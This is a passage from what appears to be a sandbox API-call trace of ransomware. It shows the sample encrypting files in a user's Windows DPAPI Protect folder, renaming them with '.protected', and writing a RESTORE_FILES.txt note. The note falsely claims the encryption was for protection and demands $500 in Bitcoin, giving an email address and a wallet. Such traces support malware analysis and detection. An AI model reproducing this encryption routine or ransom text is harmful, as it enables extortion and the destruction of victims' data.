lpSrch=".protected") returned 0x0 [0090.347] lstrcmpW (lpString1="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpString2="RESTORE_FILES.txt") returned -1 [0090.347] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.347] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0090.347] StrStrW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpSrch=".txt") returned 0x0 [0090.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0090.347] StrStrW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpSrch=".rar") returned 0x0 [0090.347] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2") returned 151 [0090.347] StrStrW (lpFirst="102a7bc8-3f85-4bb4-840a-38257d2965d2", lpSrch=".zip") returned 0x0 [0090.347] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.348] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.348] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.348] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.348] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.348] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.349] CloseHandle (hObject=0x150) returned 1 [0090.349] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.protected") returned 161 [0090.349] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.protected")) returned 1 [0090.349] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.349] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="Windows") returned -1 [0090.349] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="Program Files") returned -1 [0090.349] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="Program Files (x86)") returned -1 [0090.349] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="$Recycle.bin") returned 1 [0090.350] lstrcmpiW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="System Volume Information") returned -1 [0090.350] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0090.350] StrStrIW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".protected") returned 0x0 [0090.350] lstrcmpW (lpString1="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpString2="RESTORE_FILES.txt") returned -1 [0090.350] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.350] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0090.350] StrStrW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".txt") returned 0x0 [0090.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0090.350] StrStrW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".rar") returned 0x0 [0090.350] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d") returned 151 [0090.350] StrStrW (lpFirst="2be989a0-16a1-424b-9211-51aa3bb43e5d", lpSrch=".zip") returned 0x0 [0090.350] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.351] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.351] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.351] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.351] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.351] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.351] CloseHandle (hObject=0x150) returned 1 [0090.351] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.protected") returned 161 [0090.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.protected")) returned 1 [0090.352] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="Windows") returned -1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="Program Files") returned -1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="Program Files (x86)") returned -1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="$Recycle.bin") returned 1 [0090.352] lstrcmpiW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="System Volume Information") returned -1 [0090.352] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0090.352] StrStrIW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".protected") returned 0x0 [0090.352] lstrcmpW (lpString1="fbbe72db-afd8-443b-88dd-64b20388700d", lpString2="RESTORE_FILES.txt") returned -1 [0090.352] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.352] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.352] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0090.352] StrStrW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".txt") returned 0x0 [0090.352] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0090.352] StrStrW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".rar") returned 0x0 [0090.352] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d") returned 151 [0090.352] StrStrW (lpFirst="fbbe72db-afd8-443b-88dd-64b20388700d", lpSrch=".zip") returned 0x0 [0090.353] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.353] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.353] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d4, lpOverlapped=0x0) returned 1 [0090.353] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.353] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.353] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.353] CloseHandle (hObject=0x150) returned 1 [0090.354] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.protected") returned 161 [0090.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.protected")) returned 1 [0090.354] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="Windows") returned -1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="Program Files") returned -1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="Program Files (x86)") returned -1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="$Recycle.bin") returned 1 [0090.354] lstrcmpiW (lpString1="Preferred", lpString2="System Volume Information") returned -1 [0090.354] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0090.354] StrStrIW (lpFirst="Preferred", lpSrch=".protected") returned 0x0 [0090.354] lstrcmpW (lpString1="Preferred", lpString2="RESTORE_FILES.txt") returned -1 [0090.355] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0090.355] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0090.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0090.355] StrStrW (lpFirst="Preferred", lpSrch=".txt") returned 0x0 [0090.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0090.355] StrStrW (lpFirst="Preferred", lpSrch=".rar") returned 0x0 [0090.355] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred") returned 124 [0090.355] StrStrW (lpFirst="Preferred", lpSrch=".zip") returned 0x0 [0090.355] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0090.355] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.356] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18, lpOverlapped=0x0) returned 1 [0090.356] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.356] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0090.356] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0090.356] CloseHandle (hObject=0x150) returned 1 [0090.356] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.protected") returned 134 [0090.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred.protected")) returned 1 [0090.357] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.357] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.357] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RESTORE_FILES.txt") returned 132 [0090.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.358] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.358] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.359] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.359] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.359] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.359] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.359] CloseHandle (hObject=0x14c) returned 1 [0090.360] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="Windows") returned -1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="Program Files") returned 1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="Program Files (x86)") returned 1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="$Recycle.bin") returned 1 [0090.360] lstrcmpiW (lpString1="SYNCHIST", lpString2="System Volume Information") returned -1 [0090.360] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 76 [0090.360] StrStrIW (lpFirst="SYNCHIST", lpSrch=".protected") returned 0x0 [0090.360] lstrcmpW (lpString1="SYNCHIST", 